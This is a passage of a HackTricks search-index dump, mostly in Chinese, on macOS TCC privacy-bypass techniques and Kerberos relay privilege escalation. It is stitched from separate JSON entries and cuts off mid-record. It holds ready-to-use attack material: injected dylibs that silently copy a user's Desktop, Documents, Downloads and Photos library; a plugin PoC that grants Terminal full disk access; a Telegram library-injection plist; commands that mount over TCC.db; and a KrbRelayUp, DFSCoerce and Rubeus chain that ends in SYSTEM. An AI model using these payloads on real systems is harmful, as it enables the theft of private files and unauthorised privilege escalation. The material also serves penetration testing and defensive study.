macOS TCC Bypasses » SQLITE_AUTO_TRACE","id":"2683","title":"SQLITE_AUTO_TRACE"},"2684":{"body":"这个 env 变量被 Metal 框架使用 ,这是多个程序的依赖,最显著的是 Music,它具有 FDA。 设置以下内容:MTL_DUMP_PIPELINES_TO_JSON_FILE=\\"path/name\\"。如果 path 是有效目录,漏洞将被触发,我们可以使用 fs_usage 查看程序中发生的事情: 一个文件将被 open(),名为 path/.dat.nosyncXXXX.XXXXXX(X 是随机的) 一个或多个 write() 将内容写入文件(我们无法控制这一点) path/.dat.nosyncXXXX.XXXXXX 将被 renamed() 为 path/name 这是一个临时文件写入,随后是一个 rename(old, 
new) 这并不安全。 这并不安全,因为它必须 分别解析旧路径和新路径 ,这可能需要一些时间,并且可能容易受到竞争条件的影响。有关更多信息,您可以查看 xnu 函数 renameat_internal()。 caution 所以,基本上,如果一个特权进程正在从您控制的文件夹重命名,您可能会获得 RCE 并使其访问不同的文件,或者像在这个 CVE 中那样,打开特权应用程序创建的文件并存储一个 FD。 如果重命名访问一个您控制的文件夹,同时您已修改源文件或拥有其 FD,您可以将目标文件(或文件夹)更改为指向一个符号链接,这样您就可以随时写入。 这是 CVE 中的攻击:例如,要覆盖用户的 TCC.db,我们可以: 创建 /Users/hacker/ourlink 指向 /Users/hacker/Library/Application Support/com.apple.TCC/ 创建目录 /Users/hacker/tmp/ 设置 MTL_DUMP_PIPELINES_TO_JSON_FILE=/Users/hacker/tmp/TCC.db 通过运行带有此 env 变量的 Music 来触发漏洞 捕获 /Users/hacker/tmp/.dat.nosyncXXXX.XXXXXX 的 open()(X 是随机的) 在这里我们也 open() 这个文件以进行写入,并保持文件描述符 原子性地在 /Users/hacker/tmp 和 /Users/hacker/ourlink 之间切换 在一个循环中 我们这样做是为了最大化成功的机会,因为竞争窗口相当小,但输掉比赛的代价微乎其微 等待一会儿 测试我们是否幸运 如果没有,从头再来 更多信息请查看 https://gergelykalman.com/lateralus-CVE-2023-32407-a-macos-tcc-bypass.html caution 现在,如果您尝试使用 env 变量 MTL_DUMP_PIPELINES_TO_JSON_FILE,应用程序将无法启动","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » MTL_DUMP_PIPELINES_TO_JSON_FILE - CVE-2023-32407","id":"2684","title":"MTL_DUMP_PIPELINES_TO_JSON_FILE - CVE-2023-32407"},"2685":{"body":"作为 root,您可以启用此服务, ARD 代理将具有完全的磁盘访问权限 ,这可能会被用户滥用以使其复制新的 TCC 用户数据库 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » Apple Remote Desktop","id":"2685","title":"Apple Remote Desktop"},"2686":{"body":"TCC 在用户的 HOME 文件夹中使用数据库来控制特定于用户的资源访问,路径为 $HOME/Library/Application Support/com.apple.TCC/TCC.db 。 因此,如果用户设法使用指向 不同文件夹 的 $HOME env 变量重新启动 TCC,用户可以在 /Library/Application Support/com.apple.TCC/TCC.db 中创建一个新的 TCC 数据库,并欺骗 TCC 授予任何应用程序任何 TCC 权限。 tip 请注意,Apple 使用存储在用户配置文件中的 NFSHomeDirectory 属性的设置作为 $HOME 的值,因此如果您妥协了一个有权限修改此值的应用程序( kTCCServiceSystemPolicySysAdminFiles ),您可以 武器化 此选项以绕过 TCC。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 通过 NFSHomeDirectory","id":"2686","title":"通过 
NFSHomeDirectory"},"2687":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2020–9934 - TCC","id":"2687","title":"CVE-2020–9934 - TCC"},"2688":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2020-27937 - Directory Utility","id":"2688","title":"CVE-2020-27937 - Directory Utility"},"2689":{"body":"第一个 POC 使用 dsexport 和 dsimport 来修改用户的 HOME 文件夹。 获取目标应用程序的 csreq blob。 植入一个带有所需访问权限和 csreq blob 的假 TCC.db 文件。 使用 dsexport 导出用户的目录服务条目。 修改目录服务条目以更改用户的主目录。 使用 dsimport 导入修改后的目录服务条目。 停止用户的 tccd 并重启该进程。 第二个 POC 使用 /usr/libexec/configd ,它具有 com.apple.private.tcc.allow,值为 kTCCServiceSystemPolicySysAdminFiles。 可以使用 -t 选项运行 configd ,攻击者可以指定 自定义 Bundle 进行加载 。因此,该漏洞 替换 了 dsexport 和 dsimport 更改用户主目录的方法,使用 configd 代码注入 。 有关更多信息,请查看 原始报告 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2021-30970 - Powerdir","id":"2689","title":"CVE-2021-30970 - Powerdir"},"269":{"body":"在 Windows 中,您 可能能够强制某些特权账户对任意机器进行身份验证 。请阅读以下页面以了解如何: Force NTLM Privileged Authentication","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » 强制 NTLM 登录","id":"269","title":"强制 NTLM 登录"},"2690":{"body":"有不同的技术可以在进程内部注入代码并滥用其 TCC 权限: macOS Process Abuse 此外,发现的最常见的通过 TCC 的进程注入是通过 插件(加载库) 。 插件是通常以库或 plist 形式存在的额外代码,将由 主应用程序加载 ,并将在其上下文中执行。因此,如果主应用程序有权访问 TCC 限制的文件(通过授予的权限或特权), 自定义代码也将拥有这些权限 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 通过进程注入","id":"2690","title":"通过进程注入"},"2691":{"body":"应用程序 /System/Library/CoreServices/Applications/Directory Utility.app 具有特权 kTCCServiceSystemPolicySysAdminFiles ,加载了扩展名为 .daplug 的插件,并且 没有经过强化 的运行时。 为了武器化此 CVE, NFSHomeDirectory 被 更改 (滥用之前的特权),以便能够 接管用户的 TCC 数据库 以绕过 TCC。 有关更多信息,请查看 原始报告 。","breadcrumbs":"macOS Security & Privilege 
Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2020-27937 - Directory Utility","id":"2691","title":"CVE-2020-27937 - Directory Utility"},"2692":{"body":"二进制文件 /usr/sbin/coreaudiod 具有特权 com.apple.security.cs.disable-library-validation 和 com.apple.private.tcc.manager。第一个 允许代码注入 ,第二个则赋予其 管理 TCC 的权限。 该二进制文件允许从文件夹 /Library/Audio/Plug-Ins/HAL 加载 第三方插件 。因此,可以使用此 PoC 加载插件并滥用 TCC 权限 : objectivec #import \\n#import extern void TCCAccessSetForBundleIdAndCodeRequirement(CFStringRef TCCAccessCheckType, CFStringRef bundleID, CFDataRef requirement, CFBooleanRef giveAccess); void add_tcc_entry() {\\nCFStringRef TCCAccessCheckType = CFSTR(\\"kTCCServiceSystemPolicyAllFiles\\"); CFStringRef bundleID = CFSTR(\\"com.apple.Terminal\\");\\nCFStringRef pureReq = CFSTR(\\"identifier \\\\\\"com.apple.Terminal\\\\\\" and anchor apple\\");\\nSecRequirementRef requirement = NULL;\\nSecRequirementCreateWithString(pureReq, kSecCSDefaultFlags, &requirement);\\nCFDataRef requirementData = NULL;\\nSecRequirementCopyData(requirement, kSecCSDefaultFlags, &requirementData); TCCAccessSetForBundleIdAndCodeRequirement(TCCAccessCheckType, bundleID, requirementData, kCFBooleanTrue);\\n} __attribute__((constructor)) static void constructor(int argc, const char **argv) { add_tcc_entry(); NSLog(@\\"[+] Exploitation finished...\\");\\nexit(0); 有关更多信息,请查看 原始报告 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2020-29621 - Coreaudiod","id":"2692","title":"CVE-2020-29621 - Coreaudiod"},"2693":{"body":"通过 Core Media I/O 打开摄像头流的系统应用程序(具有 kTCCServiceCamera 的应用程序)会加载位于 /Library/CoreMediaIO/Plug-Ins/DAL 的 这些插件 (不受 SIP 限制)。 只需在此处存储一个带有常见 构造函数 的库即可 注入代码 。 多个 Apple 应用程序对此存在漏洞。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 设备抽象层 (DAL) 插件","id":"2693","title":"设备抽象层 (DAL) 插件"},"2694":{"body":"Firefox 应用程序具有 
com.apple.security.cs.disable-library-validation 和 com.apple.security.cs.allow-dyld-environment-variables 权限: xml codesign -d --entitlements :- /Applications/Firefox.app\\nExecutable=/Applications/Firefox.app/Contents/MacOS/firefox \\n\\n\\n\\ncom.apple.security.cs.allow-unsigned-executable-memory\\n\\ncom.apple.security.cs.disable-library-validation\\n\\ncom.apple.security.cs.allow-dyld-environment-variables\\n\\ncom.apple.security.device.audio-input\\n\\ncom.apple.security.device.camera\\n\\ncom.apple.security.personal-information.location\\n\\ncom.apple.security.smartcard\\n\\n\\n 有关如何轻松利用此漏洞的更多信息,请 查看原始报告 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » Firefox","id":"2694","title":"Firefox"},"2695":{"body":"二进制文件/system/Library/Filesystems/acfs.fs/Contents/bin/xsanctl具有权限**com.apple.private.tcc.allow 和 com.apple.security.get-task-allow**,这允许在进程内部注入代码并使用TCC权限。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2020-10006","id":"2695","title":"CVE-2020-10006"},"2696":{"body":"Telegram具有权限**com.apple.security.cs.allow-dyld-environment-variables 和 com.apple.security.cs.disable-library-validation ,因此可以利用它 获取其权限**,例如使用相机录制。您可以 在报告中找到有效载荷 。 注意如何使用环境变量加载库, 创建了一个自定义plist 来注入此库,并使用**launchctl**来启动它: xml \\n\\n\\n\\nLabel\\ncom.telegram.launcher\\nRunAtLoad\\n\\nEnvironmentVariables\\n\\nDYLD_INSERT_LIBRARIES\\n/tmp/telegram.dylib\\n\\nProgramArguments\\n\\n/Applications/Telegram.app/Contents/MacOS/Telegram\\n\\nStandardOutPath\\n/tmp/telegram.log\\nStandardErrorPath\\n/tmp/telegram.log\\n\\n bash launchctl load com.telegram.launcher.plist","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2023-26818 - Telegram","id":"2696","title":"CVE-2023-26818 - Telegram"},"2697":{"body":"即使在沙盒中也可以调用 open","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security 
Protections » macOS TCC » macOS TCC Bypasses » 通过开放调用","id":"2697","title":"通过开放调用"},"2698":{"body":"在技术人员使用的计算机上,给终端 完全磁盘访问 (FDA) 是很常见的。并且可以使用它调用 .terminal 脚本。 .terminal 脚本是 plist 文件,例如这个文件,其中包含在 CommandString 键中执行的命令: xml \\n \\n\\nCommandString\\ncp ~/Desktop/private.txt /tmp/;\\nProfileCurrentVersion\\n2.0600000000000001\\nRunCommandAsShell\\n\\nname\\nexploit\\ntype\\nWindow Settings\\n\\n 一个应用程序可以在 /tmp 等位置写入一个终端脚本,并使用以下命令启动它: objectivec // Write plist in /tmp/tcc.terminal\\n[...]\\nNSTask *task = [[NSTask alloc] init];\\nNSString * exploit_location = @\\"/tmp/tcc.terminal\\";\\ntask.launchPath = @\\"/usr/bin/open\\";\\ntask.arguments = @[@\\"-a\\", @\\"/System/Applications/Utilities/Terminal.app\\",\\nexploit_location]; task.standardOutput = pipe;\\n[task launch];","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 终端脚本","id":"2698","title":"终端脚本"},"2699":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 通过挂载","id":"2699","title":"通过挂载"},"27":{"body":"根据 你进行的 测试 是 内部测试还是外部测试 ,你可能会对查找 公司网络中的主机 (内部测试)或 在互联网上查找公司的资产 (外部测试)感兴趣。 note 请注意,如果你正在进行外部测试,一旦你成功获得公司内部网络的访问权限,你应该重新开始本指南。","breadcrumbs":"Pentesting Methodology » 1- 发现网络中的主机 / 发现公司的资产","id":"27","title":"1- 发现网络中的主机 / 发现公司的资产"},"270":{"body":"Kerberos 中继攻击 从一个服务窃取 AP-REQ 票证 ,并将其重新用于共享 相同计算机账户密钥 的第二个服务(因为两个 SPN 位于同一 $ 机器账户上)。即使 SPN 的 服务类别不同 (例如 CIFS/ → LDAP/),这也有效,因为解密票证的 密钥 是机器的 NT 哈希,而不是 SPN 字符串本身,SPN 字符串不是签名的一部分。 与 NTLM 中继不同,跳转仅限于 同一主机 ,但是,如果您针对允许您写入 LDAP 的协议,您可以链入 基于资源的受限委派 (RBCD) 或 AD CS 注册 ,并在一次操作中获取 NT AUTHORITY\\\\SYSTEM 。 有关此攻击的详细信息,请查看: https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html https://decoder.cloud/2025/04/24/from-ntlm-relay-to-kerberos-relay-everything-you-need-to-know/ Kerberos 基础知识 令牌 目的 中继相关性 TGT / AS-REQ ↔ REP 向 KDC 证明用户 未触及 服务票证 / TGS-REQ ↔ REP 绑定到一个 SPN ;使用 SPN 拥有者的密钥加密 如果 SPN 共享账户则可互换 AP-REQ 客户端将 
TGS 发送到服务 我们窃取和重放的内容 票证使用 拥有 SPN 的账户的密码派生密钥 加密。 AP-REQ 内的 Authenticator 有一个 5 分钟的时间戳;在该窗口内重放有效,直到服务缓存看到重复。 Windows 很少检查票证中的 SPN 字符串是否与您访问的服务匹配,因此 CIFS/HOST 的票证通常可以在 LDAP/HOST 上正常解密。 中继 Kerberos 必须满足的条件 共享密钥: 源和目标 SPN 属于同一计算机账户(Windows 服务器上的默认设置)。 无通道保护: SMB/LDAP 签名关闭,HTTP/LDAPS 的 EPA 关闭。 您可以拦截或强制身份验证: LLMNR/NBNS 中毒,DNS 欺骗, PetitPotam / DFSCoerce RPC ,伪造 AuthIP,恶意 DCOM 等。 票证来源未被使用: 您在真实数据包到达之前赢得比赛或完全阻止它;否则服务器的重放缓存会触发事件 4649。 您需要以某种方式能够在通信中执行 MitM ,可能是 DNSAmins 组的一部分,以修改域的 DNS 或能够更改受害者的 HOST 文件。","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » Kerberos 中继攻击","id":"270","title":"Kerberos 中继攻击"},"2700":{"body":"任何用户 (甚至是无特权用户)都可以创建并挂载时间机器快照,并 访问该快照的所有文件 。 所需的 唯一特权 是用于访问的应用程序(如 Terminal)需要具有 完全磁盘访问 (FDA)权限(kTCCServiceSystemPolicyAllfiles),该权限需要由管理员授予。 bash # Create snapshot\\ntmutil localsnapshot # List snapshots\\ntmutil listlocalsnapshots /\\nSnapshots for disk /:\\ncom.apple.TimeMachine.2023-05-29-001751.local # Generate folder to mount it\\ncd /tmp # I didn it from this folder\\nmkdir /tmp/snap # Mount it, \\"noowners\\" will mount the folder so the current user can access everything\\n/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap # Access it\\nls /tmp/snap/Users/admin_user # This will work 更详细的解释可以在 原始报告中找到 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2020-9771 - mount_apfs TCC 绕过和权限提升","id":"2700","title":"CVE-2020-9771 - mount_apfs TCC 绕过和权限提升"},"2701":{"body":"即使TCC数据库文件受到保护,仍然可以 在目录上挂载 一个新的TCC.db文件: bash # CVE-2021-1784\\n## Mount over Library/Application\\\\ Support/com.apple.TCC\\nhdiutil attach -owners off -mountpoint Library/Application\\\\ Support/com.apple.TCC test.dmg # CVE-2021-1784\\n## Mount over ~/Library\\nhdiutil attach -readonly -owners off -mountpoint ~/Library /tmp/tmp.dmg python # This was the python function to create the dmg\\ndef 
create_dmg():\\nos.system(\\"hdiutil create /tmp/tmp.dmg -size 2m -ov -volname \\\\\\"tccbypass\\\\\\" -fs APFS 1>/dev/null\\")\\nos.system(\\"mkdir /tmp/mnt\\")\\nos.system(\\"hdiutil attach -owners off -mountpoint /tmp/mnt /tmp/tmp.dmg 1>/dev/null\\")\\nos.system(\\"mkdir -p /tmp/mnt/Application\\\\ Support/com.apple.TCC/\\")\\nos.system(\\"cp /tmp/TCC.db /tmp/mnt/Application\\\\ Support/com.apple.TCC/TCC.db\\")\\nos.system(\\"hdiutil detach /tmp/mnt 1>/dev/null\\") 检查 完整的利用 在 原始写作 中。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2021-1784 & CVE-2021-30808 - 在TCC文件上挂载","id":"2701","title":"CVE-2021-1784 & CVE-2021-30808 - 在TCC文件上挂载"},"2702":{"body":"正如在 原始写作 中所解释的,这个CVE利用了diskarbitrationd。 公共DiskArbitration框架中的函数DADiskMountWithArgumentsCommon执行了安全检查。然而,可以通过直接调用diskarbitrationd来绕过它,因此可以在路径中使用../元素和符号链接。 这使得攻击者能够在任何位置进行任意挂载,包括由于diskarbitrationd的com.apple.private.security.storage-exempt.heritable权限而覆盖TCC数据库。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » CVE-2024-40855","id":"2702","title":"CVE-2024-40855"},"2703":{"body":"工具**/usr/sbin/asr**允许复制整个磁盘并将其挂载到另一个位置,从而绕过TCC保护。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » asr","id":"2703","title":"asr"},"2704":{"body":"在**/var/db/locationd/clients.plist 中有一个第三个TCC数据库,用于指示允许 访问位置服务 的客户端。 文件夹 /var/db/locationd/没有受到DMG挂载的保护**,因此可以挂载我们自己的plist。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 位置服务","id":"2704","title":"位置服务"},"2705":{"body":"macOS Auto Start","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 通过启动应用程序","id":"2705","title":"通过启动应用程序"},"2706":{"body":"在多个场合,文件会在未受保护的位置存储敏感信息,如电子邮件、电话号码、消息等...(这被视为Apple的一个漏洞)。","breadcrumbs":"macOS Security & Privilege Escalation 
» macOS Security Protections » macOS TCC » macOS TCC Bypasses » 通过grep","id":"2706","title":"通过grep"},"2707":{"body":"这不再有效,但它 在过去有效 : 另一种使用 CoreGraphics事件 的方法:","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 合成点击","id":"2707","title":"合成点击"},"2708":{"body":"https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8 https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/ 20+ Ways to Bypass Your macOS Privacy Mechanisms Knockout Win Against TCC - 20+ NEW Ways to Bypass Your MacOS Privacy Mechanisms tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » 参考","id":"2708","title":"参考"},"2709":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » macOS Apple Scripts » macOS Apple Scripts","id":"2709","title":"macOS Apple Scripts"},"271":{"body":"3.1 侦察主机 powershell # find servers where HTTP, LDAP or CIFS share the same machine account\\nGet-ADComputer -Filter * -Properties servicePrincipalName |\\nWhere-Object {$_.servicePrincipalName -match \'(HTTP|LDAP|CIFS)\'} |\\nSelect Name,servicePrincipalName 3.2 启动中继监听器 KrbRelayUp powershell # one-click local SYSTEM via RBCD\\n.\\\\KrbRelayUp.exe relay --spn \\"ldap/DC01.lab.local\\" --method rbcd --clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 KrbRelayUp 将 KrbRelay → LDAP → RBCD → Rubeus → SCM 绕过 包装在一个二进制文件中。 3.3 强制 Kerberos 认证 powershell # coerce DC to auth over SMB with DFSCoerce\\n.\\\\dfscoerce.exe --target \\\\\\\\DC01.lab.local --listener 10.0.0.50 DFSCoerce使DC向我们发送Kerberos CIFS/DC01票证。 3.4 中继AP-REQ KrbRelay从SMB中提取GSS blob,将其重新打包为LDAP绑定,并将其转发到ldap://DC01——身份验证成功,因为 相同的密钥 解密了它。 3.5 滥用LDAP ➜ RBCD ➜ SYSTEM powershell # (auto inside KrbRelayUp) manual for clarity\\nNew-MachineAccount -Name \\"FAKE01\\" -Password \\"P@ss123\\"\\nKrbRelay.exe -spn ldap/DC01 -rbcd FAKE01_SID\\nRubeus s4u /user:FAKE01$ /rc4: /impersonateuser:administrator /msdsspn:HOST/DC01 /ptt\\nSCMUACBypass.exe 您现在拥有 NT AUTHORITY\\\\SYSTEM 。","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » Kerberos 中继步骤","id":"271","title":"Kerberos 中继步骤"},"2710":{"body":"这是一种用于任务自动化的脚本语言, 与远程进程交互 。它使得 请求其他进程执行某些操作 变得相当简单。 恶意软件 可能会滥用这些功能,以利用其他进程导出的功能。 例如,恶意软件可以 在浏览器打开的页面中注入任意的JS代码 。或者 自动点击 用户请求的某些允许权限; applescript tell window 1 of process \\"SecurityAgent\\"\\nclick button \\"Always Allow\\" of group 1\\nend tell 这里有一些示例: https://github.com/abbeycode/AppleScripts 在这里找到有关恶意软件使用苹果脚本的更多信息 here 。 苹果脚本可以很容易地 \\" 编译 \\"。这些版本可以通过 osadecompile 很容易地 \\" 反编译 \\"。 然而,这些脚本也可以 导出为“只读” (通过“导出...”选项): 
```\\nfile mal.scpt\\nmal.scpt: AppleScript compiled\\n```\\n在这种情况下,即使使用 `osadecompile` 也无法反编译内容。 然而,仍然有一些工具可以用来理解这种可执行文件, 阅读此研究以获取更多信息 。工具 applescript-disassembler 和 aevt_decompile 将非常有助于理解脚本的工作原理。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Bypasses » macOS Apple Scripts » Apple Scripts","id":"2710","title":"Apple Scripts"},"2711":{"body":"Reading time: 16 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Payloads » macOS TCC Payloads","id":"2711","title":"macOS TCC Payloads"},"2712":{"body":"权限 : 无 TCC : kTCCServiceSystemPolicyDesktopFolder ObjetiveC\\nShell 将 $HOME/Desktop 复制到 /tmp/desktop。 objectivec #include \\n#include \\n#include \\n#include \\n#import // gcc -dynamiclib -framework Foundation -o /tmp/inject.dylib /tmp/inject.m __attribute__((constructor))\\nvoid myconstructor(int argc, const char **argv)\\n{\\nfreopen(\\"/tmp/logs.txt\\", \\"w\\", stderr); // Redirect stderr to /tmp/logs.txt NSFileManager *fileManager = [NSFileManager defaultManager];\\nNSError *error = nil; // Get the path to the user\'s Pictures folder\\nNSString *picturesPath = [NSHomeDirectory() stringByAppendingPathComponent:@\\"Desktop\\"];\\nNSString *tmpPhotosPath = @\\"/tmp/desktop\\"; // Copy the contents recursively\\nif (![fileManager copyItemAtPath:picturesPath toPath:tmpPhotosPath error:&error]) {\\nNSLog(@\\"Error copying items: %@\\", error);\\n} NSLog(@\\"Copy completed successfully.\\", error); fclose(stderr); // Close the file stream\\n} 将 $HOME/Desktop 复制到 /tmp/desktop。 bash cp -r \\"$HOME/Desktop\\" \\"/tmp/desktop\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Payloads » 桌面","id":"2712","title":"桌面"},"2713":{"body":"权限 : 无 TCC : kTCCServiceSystemPolicyDocumentsFolder ObjetiveC\\nShell 将 $HOME/Documents 复制到 /tmp/documents。 objectivec #include \\n#include \\n#include \\n#include \\n#import // gcc -dynamiclib -framework Foundation -o /tmp/inject.dylib /tmp/inject.m __attribute__((constructor))\\nvoid myconstructor(int argc, const char **argv)\\n{\\nfreopen(\\"/tmp/logs.txt\\", \\"w\\", stderr); // Redirect stderr to /tmp/logs.txt NSFileManager *fileManager = [NSFileManager defaultManager];\\nNSError *error = nil; // Get the path to the user\'s 
Pictures folder\\nNSString *picturesPath = [NSHomeDirectory() stringByAppendingPathComponent:@\\"Documents\\"];\\nNSString *tmpPhotosPath = @\\"/tmp/documents\\"; // Copy the contents recursively\\nif (![fileManager copyItemAtPath:picturesPath toPath:tmpPhotosPath error:&error]) {\\nNSLog(@\\"Error copying items: %@\\", error);\\n} NSLog(@\\"Copy completed successfully.\\", error); fclose(stderr); // Close the file stream\\n} 将 $HOME/Documents 复制到 /tmp/documents。 bash cp -r \\"$HOME/Documents\\" \\"/tmp/documents\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Payloads » 文档","id":"2713","title":"文档"},"2714":{"body":"权限 : 无 TCC : kTCCServiceSystemPolicyDownloadsFolder ObjectiveC\\nShell 将 $HOME/Downloads 复制到 /tmp/downloads。 objectivec #include \\n#include \\n#include \\n#include \\n#import // gcc -dynamiclib -framework Foundation -o /tmp/inject.dylib /tmp/inject.m __attribute__((constructor))\\nvoid myconstructor(int argc, const char **argv)\\n{\\nfreopen(\\"/tmp/logs.txt\\", \\"w\\", stderr); // Redirect stderr to /tmp/logs.txt NSFileManager *fileManager = [NSFileManager defaultManager];\\nNSError *error = nil; // Get the path to the user\'s Pictures folder\\nNSString *picturesPath = [NSHomeDirectory() stringByAppendingPathComponent:@\\"Downloads\\"];\\nNSString *tmpPhotosPath = @\\"/tmp/downloads\\"; // Copy the contents recursively\\nif (![fileManager copyItemAtPath:picturesPath toPath:tmpPhotosPath error:&error]) {\\nNSLog(@\\"Error copying items: %@\\", error);\\n} NSLog(@\\"Copy completed successfully.\\", error); fclose(stderr); // Close the file stream\\n} 将 $HOME/Downloads 复制到 /tmp/downloads。 bash cp -r \\"$HOME/Downloads\\" \\"/tmp/downloads\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Payloads » 下载","id":"2714","title":"下载"},"2715":{"body":"权限 : com.apple.security.personal-information.photos-library TCC : kTCCServicePhotos 
ObjectiveC\\nShell 复制 $HOME/Pictures/Photos Library.photoslibrary 到 /tmp/photos。 objectivec #include \\n#include \\n#include \\n#include \\n#import // gcc -dynamiclib -framework Foundation -o /tmp/inject.dylib /tmp/inject.m __attribute__((constructor))\\nvoid myconstructor(int argc, const char **argv)\\n{\\nfreopen(\\"/tmp/logs.txt\\", \\"w\\", stderr); // Redirect stderr to /tmp/logs.txt NSFileManager *fileManager = [NSFileManager defaultManager];\\nNSError *error = nil; // Get the path to the user\'s Pictures folder\\nNSString *picturesPath = [NSHomeDirectory() stringByAppendingPathComponent:@\\"Pictures/Photos Library.photoslibrary\\"];\\nNSString *tmpPhotosPath = @\\"/tmp/photos\\"; // Copy the contents recursively\\nif (![fileManager copyItemAtPath:picturesPath toPath:tmpPhotosPath error:&error]) {\\nNSLog(@\\"Error copying items: %@\\", error);\\n} NSLog(@\\"Copy completed successfully.\\", error); fclose(stderr); // Close the file stream\\n} 将 $HOME/Pictures/Photos Library.photoslibrary 复制到 /tmp/photos。 bash cp -r \\"$HOME/Pictures/Photos Library.photoslibrary\\" \\"/tmp/photos\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Payloads » 照片库","id":"2715","title":"照片库"},"2716":{"body":"权限 : com.apple.security.personal-information.addressbook TCC : kTCCServiceAddressBook ObjectiveC\\nShell 将 $HOME/Library/Application Support/AddressBook 复制到 /tmp/contacts。 objectivec #include \\n#include \\n#include \\n#include \\n#import // gcc -dynamiclib -framework Foundation -o /tmp/inject.dylib /tmp/inject.m __attribute__((constructor))\\nvoid myconstructor(int argc, const char 